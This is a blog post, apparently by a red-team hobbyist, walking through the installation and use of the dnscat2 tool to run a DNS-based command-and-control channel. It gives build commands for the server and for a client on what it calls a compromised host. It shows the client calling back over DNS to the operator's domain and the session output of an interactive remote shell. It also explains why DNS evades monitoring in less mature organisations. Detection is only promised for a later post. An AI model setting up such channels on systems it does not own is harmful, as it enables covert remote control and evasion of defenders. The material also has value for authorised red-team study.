DNS C2 Part 2: Using dnscat2 On Your New C2 Server

For the second part in this series, we will go over the installation, execution, and use of dnscat2 as a communication channel. Again, nothing groundbreaking here. The main thrust of this is to document some of the setup hiccups I went through while playing with this so that I don’t have to relearn it next time. I will touch a little on some of the how/why as I walk through the steps though. In the third post, I plan to do a deeper dive into what this traffic looks like and how the channel works.

Comms Over DNS

Why DNS? Clearly, it’s not the most robust way to send data. If you walk through this exercise you’ll see it’s about as fast as you would expect it to be since the DNS protocol restricts queries to 255 bytes. First, your protocol of choice may be blocked/monitored outbound. DNS is much less likely to face such restrictions. Second, many organizations with less mature info-sec departments may simply not be looking at DNS traffic for signs of compromise. Reviewing DNS logs might not be at the top of anyone’s to-do list.

Because people like @mattifestation are constantly touting the benefits of thinking like a blue teamer I will also write up some thoughts on detection in the next post.

Setting up and running dnscat2

From the Server

Starting from your C2 server. I’ll assume you are on a distro that has APT available since Ubuntu is pretty common across VPS providers.

apt-get install ruby-dev gcc make
gem install bundler
git clone https://github.com/iagox86/dnscat2
cd dnscat2/server/
bundle install

Now just test it out with ruby ./dnscat2.rb and you are ready to roll.

From the Client

Now jump over to your client. This will represent our compromised host in this instance. Our client here is an Ubuntu machine:

apt-get install gcc make
git clone https://github.com/iagox86/dnscat2
cd  dnscat2/client/
make

You should now have the binary in the client folder ready to run.

There are several fun options for other OS targets. If your target is Windows load up the dnscat2/client/win32/dnscat2.vcproj in VStudio and build it. Also, there is a PowerShell version of the client at https://github.com/lukebaggett/dnscat2-powershell.

Running dnscat2

Back at the server

In reality, you might want to start your terminal multiplexer of choice (tmux, screen, etc.) but for this test, I think we are safe just firing it up.

ruby ./dnscat2.rb [the-domain-you-setup-from-the-last-post.com] --Secret horse_battery_staple
Over to the client/compromised host
./dnscat [the-domain-you-setup-from-the-last-post.com] --secret horse_battery_staple

Back to the c2 server

Once we have a successful connection we will see:

dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2>

Now we can list active sessions with the window command:

dnscat2> window
0 :: main [active]
 crypto-debug :: Debug window for crypto stuff [*]
 dns1 :: DNS Driver running on 0.0.0.0:53 domains = not-evil.network [*]
 1 :: command (homebase) [encrypted and verified] [*]

Then interact with a session with the -i flag:

dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (homebase) 1>

Now you can have all kinds of fun up to and including an interactive shell. If you issue the shell command you should see:

New window created: 2
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

Now just press ctrl-z to get back to the main window. Then type window:

dnscat2> window
0 :: main [active]
 crypto-debug :: Debug window for crypto stuff [*]
 dns1 :: DNS Driver running on 0.0.0.0:53 domains = not-evil.network [*]
 1 :: command (homebase) [encrypted and verified]
 2 :: sh (homebase) [encrypted and verified] [*]       

We see our new widow listed as number 2. We just interact with it with the -i flag:

dnscat2> window -i 3
New window created: 3
history_size (session) => 1000
Session 3 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (homebase) 3> ls
sh (homebase) 3> controller
dnscat
dnscat.c
dnscat.o
drivers
libs
Makefile
tcpcat.c
tunnel_drivers
win32

There you go. Hack the planet and whatnot!!

Conclusion

Again, nothing even remotely groundbreaking here. Just a step-by-step on setting it up. I’m really looking forward to the next post where I will break down the how of the communication channel and do some packet dissection for illustration. Please let me know if you think I missed anything critical, would like to see more of something or have other constructive advice. @capt_red_beardz


836 Words

2018-07-18 12:34 -0700